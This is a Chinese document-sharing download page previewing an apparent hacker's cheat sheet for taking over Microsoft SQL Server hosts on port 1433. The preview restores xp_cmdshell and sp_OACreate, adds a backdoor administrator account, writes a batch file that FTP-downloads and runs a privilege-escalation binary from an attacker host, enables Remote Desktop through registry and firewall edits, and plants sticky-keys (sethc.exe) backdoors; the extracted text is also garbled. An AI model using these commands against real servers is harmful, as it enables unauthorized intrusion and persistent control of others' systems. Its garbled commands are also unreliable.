ImageVerifierCode 换一换
格式:DOCX , 页数:18 ,大小:22.52KB ,
资源ID:21963361      下载积分:3 金币
快捷下载
登录下载
邮箱/手机:
温馨提示:
快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。 如填写123,账号就是123,密码也是123。
特别说明:
请自助下载,系统不会自动发送文件的哦; 如果您已付费,想二次下载,请登录后访问:我的下载记录
支付方式: 支付宝    微信支付   
验证码:   换一换

加入VIP,免费下载
 

温馨提示:由于个人手机设置不同,如果发现不能下载,请复制以下地址【https://www.bdocx.com/down/21963361.html】到电脑端继续下载(重复下载不扣费)。

已注册用户请登录:
账号:
密码:
验证码:   换一换
  忘记密码?
三方登录: 微信登录   QQ登录  

下载须知

1: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。
2: 试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。
3: 文件的所有权益归上传用户所有。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 本站仅提供交流平台,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

版权提示 | 免责声明

本文(本人专用的1433修复全部口令全集Word文档下载推荐.docx)为本站会员(b****6)主动上传,冰豆网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知冰豆网(发送邮件至service@bdocx.com或直接QQ联系客服),我们立即给予删除!

本人专用的1433修复全部口令全集Word文档下载推荐.docx

1、)net net1都被禁用xcopy taskmgr.exe sethc.exe /y)如果cmd被禁用net user user pass /add除了xplog70.dll其他的都可以用这命令修复第一步先删除:drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc xp_cmdshell服务器: 消息 3701,级别 11,状态 5,行 1无法 除去 过程 sp_addextendedproc,因为它在系统目录中不存在。 消息 3701,级别 11,状态 5,过程 sp_dr

2、opextendedproc,行 18第二步恢复:dbcc addextendedproc (sp_oacreate,odsole70.dll) xp_cmdshellxplog70.dll直接恢复,不管sp_addextendedproc是不是存在 1.未能找到存储过程master.xpcmdshell之解决方法:EXEC sp_addextendedproc xp_cmdshell,dllname =xplog70.dlldeclare o intsp_addextendedproc xpsql70.dll恢复sp_addextendedproc语句:create procedure sp

3、_addextendedproc - 1996/08/30 20:13functname nvarchar(517),/* (owner.)name of function to call */dllname varchar(255)/* name of DLL containing function */asset implicit_transactions offif trancount 0beginraiserror(15002,-1,-1,return (1)enddbcc addextendedproc( functname, dllname)return (0) - sp_adde

4、xtendedprocGO2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。恢复方法:查询分离器连接后,sp_dropextendedproc , 修复XPLOG70.DLL(先用文件查看下备份的目录下x86bin,然后把下面目录替换)第一步第二步c:sql2ksp4x86binnxplog70.dll126 错误127 错误exec sp_addextendedproc Program FilesMicrosoft SQL ServerMSSQLBinnxplog70.dllProgram FilesMicrosoft SQL Serve

5、rMSSQLBinnxplog70.dll4.直接添加帐户法删除odsole70.dll:exec master.sp_dropextendedproc sp_oamethodexec master.sp_dropextendedproc sp_oacreate恢复odsole70.dll:exec sp_addextendedproc sp_OAMethod,odsole70.dllexec sp_addextendedproc sp_OACreate,直接添加帐户命令:declare shell int exec sp_oacreate wscript.shell,shell output

6、 exec sp_oamethod shell,run,null,windowssystem32cmd.exe /c net user sin sinhack /add,shell output exec sp_oamethod shell,windowssystem32cmd.exe/c net localgroup administrators sin /addFTP下载命令declare o int, f int, t int, ret intexec sp_oacreate scripting.filesystemobject, o outexec sp_oamethod o, cre

7、atetextfile, f out, 1.bat, 1exec ret = sp_oamethod f, writeline, NULL,open IPftp账号ftp密码get en.exe(无net提权脚本)c:en.exebye3、net提权出现 拒绝访问错误5 (重点)这种情况就不用尝试net1了,可以试试copy shift后门,如果copy后提示复制0文件,证明没有成功。那么可以试试能不能上传,如果能上传直接传个前段时间出来的无net提权工具,然后加个用户就可以了。但是这种情况大部分都是不能上传的,那么就要考虑一下了。既然能执行cmd,那么就能通过cmd下ftp下载文件,可是ft

8、p前提是要能写进文本或批处理。那么就可以通过sql语句写进一个文本或批处理啊。查询分析器执行成功后,不出意外,会在c盘出现一个1.bat(如果执行成功了,c盘却没有,可以换个文件夹写入,因为哪个服务器c盘根目录禁止写入)然后cmd执行ftp -s:1.bat这个执行完了以后,就会在c盘ftp下载一个无net提权脚本 或者直接写个vbs提权脚本1.vbsSet o=CreateObject( Shell.Users )Set z=o.create(用户z.changePassword 密码z.setting(AccountType)=3然后cmd执行cscript c:1.vbs 就可以了Cmd

9、 命令开3389:REG ADD HKLMSYSTEMCurrentControlSetControlTerminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f1.查询终端端口REG query HKLMSYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp /v PortNumber2.开启XP&2003终端服务Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f3.更改终端端口为2008(0x7d8)默认

10、为3389(0xD3D)ServerWdsrdpwdTdstcp /v PortNumber /t REG_DWORD /d 0x7d8 /fServerWinStationsRDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制REG ADD HKLMSYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileGloballyOpenPortsList /v 3389:TCP /t REG

11、_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /fsql语句开3389开3389:exec master.dbo.xp_regwriteHKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerfDenyTSConnectionsREG_DWORD,0;- 关3389:,1;查看3389端口exec xp_regread SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumber查看系统版本typ

12、e c:boot.ini普通CMD后门xp_regwrite SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exedebuggerreg_szwindowssystem32cmd.exe5下shift后门命令, o out copyfilewindowsexplorer.exe ,windowssystem32sethc.exewindowssystem32dllcachesethc.execopy c:windowsexplorer.exe c:windowssystem32sethc.e

13、xewindowssystem32sethc.exe c:windowssystem32dllcachesethc.exe5.恢复时一些常用的SQL语句:利用sp_addextendedproc恢复大部分常用存储扩展(得先利用最顶上的语句恢复自己):use masterexec sp_addextendedproc xp_cmdshell,xp_cmdshell.dllexec sp_addextendedproc xp_dirtree,xpstar.dllexec sp_addextendedproc xp_enumgroups,exec sp_addextendedproc xp_fixe

14、ddrives,exec sp_addextendedproc xp_loginconfig,exec sp_addextendedproc xp_enumerrorlogs,exec sp_addextendedproc xp_getfiledetails,exec sp_addextendedproc sp_OADestroy,exec sp_addextendedproc sp_OAGetErrorInfo,exec sp_addextendedproc sp_OAGetProperty,exec sp_addextendedproc sp_OASetProperty,exec sp_a

15、ddextendedproc sp_OAStop,exec sp_addextendedproc xp_regaddmultistring,exec sp_addextendedproc xp_regdeletekey,exec sp_addextendedproc xp_regdeletevalue,exec sp_addextendedproc xp_regenumvalues,exec sp_addextendedproc xp_regread,exec sp_addextendedproc xp_regremovemultistring,exec sp_addextendedproc

16、xp_regwrite,exec sp_addextendedproc xp_availablemedia,恢复cmdshell:exec sp_addextendedproc xp_cmdshell ,dllname =1.sql命令查询注册表粘滞键是否被劫持exec master.xp_regread Debugger2.sql命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令), REG_SZWINDOWSsystem32taskmgr.exe3.sql命令删除注册表粘滞键的劫持功能保护你的服务器不再被他人利用xp_regdeletekey SQL Server 阻止了对组件 的 过程sys.xp_cmdshell 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 。有关启用 的详细信息,请参阅 SQL Server 联机丛书中的 外围应用配置器EXEC sp_configure show advanced options, 1 - RECONFIGURE WITH OVERRIDE - EXEC sp_configure , 0 - 分析器执行的语句:, 1;RECONFIGURE;xpsql.cpp: 错误 5 来自 CreateProces

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1